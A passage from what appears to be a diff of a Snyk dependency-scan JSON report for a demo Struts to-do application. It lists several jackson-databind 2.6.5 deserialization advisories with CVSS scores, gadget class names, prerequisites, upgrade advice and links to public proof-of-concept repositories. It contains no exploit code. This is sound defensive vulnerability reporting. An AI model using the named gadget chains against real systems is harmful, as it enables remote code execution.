only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36187" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T12:47:33.579319Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + 
"alternativeIds": [], + "disclosureTime": "2021-01-07T12:44:41Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.970819Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.768509Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2998", + "title": "GitHub Issue" + }, + { + "url": 
"https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36184", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:47.820867Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.700251Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.169091Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:47.820867Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.700251Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36184)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36184" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:02:15.197495Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:00:25Z", + 
"exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.700251Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2997", + "title": "GitHub Issue" + }, + { + "url": 
"https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.757857Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.695573Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.214306Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.757857Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.695573Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36186" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:05:16.831143Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:00:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34.206083Z", + "severityBasedOn": "CVSS", + 
"modificationTime": "2024-03-11T09:51:24.695573Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Al1ex's Poc" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.867743Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.705041Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.249724Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.867743Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.705041Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36180" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:08:29.105792Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:05:51Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2021-01-07T16:40:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.705041Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3003", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:18.170866Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + 
"modificationTime": "2024-03-11T09:51:23.831271Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.268380Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:18.170866Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.831271Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3003)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36183" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:11:36.206859Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:10:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34.627750Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.831271Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
